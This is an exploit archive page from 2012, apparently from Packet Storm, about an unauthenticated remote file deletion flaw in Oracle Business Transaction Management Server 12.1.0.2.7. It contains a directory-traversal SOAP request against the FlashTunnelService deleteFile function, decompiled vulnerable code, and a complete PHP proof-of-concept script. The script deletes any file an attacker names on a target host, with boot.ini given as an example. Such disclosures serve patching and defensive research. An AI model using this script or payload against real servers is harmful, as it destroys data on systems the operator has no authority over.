what you don't know can hurt you

Oracle BTM 12.1.0.2.7 Remote File Deletion

Oracle BTM 12.1.0.2.7 Remote File Deletion
Posted Aug 7, 2012
Authored by rgod | Site retrogod.altervista.org

Oracle Business Transaction Management Server version 12.1.0.2.7 suffers from a FlashTunnelService remote file deletion vulnerability.

tags | exploit, remote
MD5 | 896c6723e4d3eb5be9d4fa7c77601292

Oracle BTM 12.1.0.2.7 Remote File Deletion

Change Mirror Download
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService
Remote File Deletion

tested against: Microsoft Windows Server 2003 r2 sp2
Oracle WebLogic Server 12c (12.1.1)
Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

files tested:
oepe-indigo-installer-12.1.1.0.1.201203120349-12.1.1-win32.exe (weblogic)
download url: http://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html

BTM_Servers_12.1.0.2.7.zip (BTM, production version)
download url: http://www.oracle.com/technetwork/oem/downloads/btw-downloads-207704.html


vulnerability:
the mentioned product installs a web service
called "FlashTunnelService" which can be reached
without prior authentication and processes incoming
SOAP requests.

It can be reached at the following uri:
http://[host]:7001/btmui/soa/flash_svc/

This soap interface exposes the 'deleteFile' function
which could allow to delete arbitrary files with administrative
privileges on the target
server through a directory traversal vulnerability.
This could be useful for further attacks.

Example packet:

POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://soa.amberpoint.com/deleteFile"
User-Agent: Jakarta Commons-HttpClient/3.1
Host: [host]:7001
Content-Length: [length]

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
<soapenv:Header/>
<soapenv:Body>
<int:deleteFileRequest>
<int:deleteFile handle="../../../../../../../../../../../../somepath/somefile.ext">
<typ:DeleteFileRequestVersion>
</typ:DeleteFileRequestVersion>
</int:deleteFile>
</int:deleteFileRequest>
</soapenv:Body>
</soapenv:Envelope>

Vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl class:
...
public IDeleteFileResponse deleteFile(IDeleteFileRequest request)
throws SOAPFaultException
{
DeleteFileResponse dfr = new DeleteFileResponse();
String handle = request.getHandle();
File f = getFileFromHandle(handle);
if(f != null)
f.delete();
return dfr;
}
...

As attachment, proof of concept code.

<?php
/*
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService
Remote File Deletion poc

tested against: Microsoft Windows Server 2003 r2 sp2
Oracle WebLogic Server 12c (12.1.1)
Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

Example:
C:\php>php 9sg_ora2.php 192.168.2.101 boot.ini

C:\php>php 9sg_ora2.php 192.168.2.101 windows\system32\win.ini

rgod
*/
error_reporting(E_ALL ^ E_NOTICE);
set_time_limit(0);

$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extesion loaded!";

if (php_sapi_name() <> "cli") {
die($err[0]);
}

function syntax() {
print("usage: php 9sg_ora2.php [ip_address] [file_to_delete]\r\n" );
die();
}

$argv[2] ? print("[*] Attacking...\n") :
syntax();

if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl("php_curl.dll") ? die($err[1]) :
print("[*] curl loaded\n");
} else {
!dl("php_curl.so") ? die($err[1]) :
print("[*] curl loaded\n");
}
}

function _s($url, $is_post, $ck, $request) {
global $_use_proxy, $proxy_host, $proxy_port;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
if ($is_post == 1) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
}
if ($is_post == 2) {
curl_setopt($ch, CURLOPT_PUT, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
}

curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
"Content-Type: text/xml;charset=UTF-8",
"SOAPAction: \"http://soa.amberpoint.com/deleteFile\"",


));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Jakarta Commons-HttpClient/3.1");
//curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
//curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 0);

if ($_use_proxy) {
curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
}
$_d = curl_exec($ch);
if (curl_errno($ch)) {
//die("[!] ".curl_error($ch)."\n");
} else {
curl_close($ch);
}
return $_d;
}
$host = $argv[1];
$port = 7001;
$file = $argv[2];

$soap='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
<soapenv:Header/>
<soapenv:Body>
<int:deleteFileRequest>
<int:deleteFile handle="../../../../../../../../../../../../../../../../../../'.$file.'">
<typ:DeleteFileRequestVersion>
</typ:DeleteFileRequestVersion>
</int:deleteFile>
</int:deleteFileRequest>
</soapenv:Body>
</soapenv:Envelope>';

$url = "http://$host:$port/btmui/soa/flash_svc/";
$out = _s($url, 1, "", $soap);
print($out."\n");
?>


Login or Register to add favorites

File Archive:

June 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    10 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close